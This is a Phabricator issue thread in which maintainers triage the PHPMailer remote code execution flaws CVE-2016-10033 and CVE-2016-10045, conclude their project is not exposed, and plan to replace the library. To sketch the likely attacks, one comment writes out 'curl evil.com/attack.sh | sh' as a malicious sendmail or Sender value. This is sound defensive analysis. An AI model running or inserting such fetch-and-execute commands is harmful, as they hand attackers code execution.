Page MenuHomePhabricator
Create Task
Maniphest T12046

PHPMailer RCE [CVE-2016-10033 and CVE-2016-10045]
Open, LowPublic
Actions

Description

Still figuring out the details on this:

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Related Objects
Search...

Event Timeline

epriestley created this task.Dec 26 2016, 4:14 PM
Herald added subscribers: eadler, revi. · View Herald TranscriptDec 26 2016, 4:14 PM
epriestley mentioned this in T1837: Implement correct send-as-user behavior..Dec 26 2016, 4:37 PM
epriestley lowered the priority of this task from High to Low.Dec 26 2016, 4:51 PM

This appears to be the fix:

https://github.com/PHPMailer/PHPMailer/commit/4835657cd639fbd09afd33307cef164edf807cdc

So I think there a couple of attacks here, which probably look something like this:

  • Somehow configuring the sendmail binary to be curl evil.com/attack.sh | sh.
  • Somehow configuring the Sender to be `curl evil.com/attack.sh | sh` or similar.

I believe we are vulnerable to neither:

  • We do not allow user or administrator configuration of the sendmail binary.
  • We never configure a Sender.
  • Empirically, our mail arrives without a "Sender" (see also T1837).
  • We disable the implicit assignment of the Sender by passing the appropriate flag:
public function setFrom($email, $name = '') {
  $this->mailer->SetFrom($email, $name, $crazy_side_effects = false);
  return $this;
}

I'll keep an eye on this, but I think no immediate action is necessary because we don't expose any way to get at these vulnerabilities.

Rather than patching PHPMailer, I'd prefer to remove it completely by replacing it with first-party code: the code is sketchy from both a quality and security point of view, and RCE in a ~2,000 line mail adapter is absurd. See also D2147.

So my tentative plan is:

  • leave it as-is for now;
  • monitor further disclosures about this vulnerability, in case I am misunderstanding the attack;
  • replace PHPMailer with a first-party replacement when we have an opportunity.
epriestley mentioned this in 2016 Week 52 (Very Late December).Dec 27 2016, 7:54 PM
eadler added a comment.Dec 28 2016, 7:16 AM

updated advisory; https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
I don't think this changes the plan you suggest, just linking for completeness.

eadler renamed this task from PHPMailer RCE [CVE-2016-10033] to PHPMailer RCE [CVE-2016-10033 and CVE-2016-10045].Dec 28 2016, 7:24 AM
epriestley added a comment.Dec 28 2016, 8:11 AM

From a cursory read of CVE-2016-10045, it seems like PHP may be written in such a way that mail() can not be invoked safely. Silly PHP!

DemiMarie added a subscriber: DemiMarie.Jan 1 2017, 7:50 PM

libcurl supports SMTP (see https://curl.haxx.se/libcurl/c/smtp-mail.html) and can be used instead, provided that the relevant functions are exposed to PHP. This avoids needing to shell out to an external executable.

Herald added a subscriber: cburroughs. · View Herald TranscriptJan 1 2017, 7:50 PM
aubort added a subscriber: aubort.Jan 5 2017, 8:42 AM
jsalmeron added a subscriber: jsalmeron.Jan 7 2017, 1:40 PM
epriestley mentioned this in T12372: Long list of reviewers breaks to: field when metamta.one-mail-per-recipient set to false.Mar 9 2017, 5:25 PM
epriestley mentioned this in T12404: Implement a first-party SMTP client.Mar 16 2017, 1:06 AM
epriestley added a parent task: T12404: Implement a first-party SMTP client.
Herald added a subscriber: andypuettmann. · View Herald TranscriptJan 27 2018, 9:54 PM
epriestley moved this task from Backlog to Future on the Mail board.Jan 27 2018, 9:54 PM
epriestley moved this task from Future to Infrastructure on the Mail board.Jan 14 2019, 4:55 PM
epriestley mentioned this in Dependencies.May 13 2019, 7:37 PM
Phabricator · Built by Phacility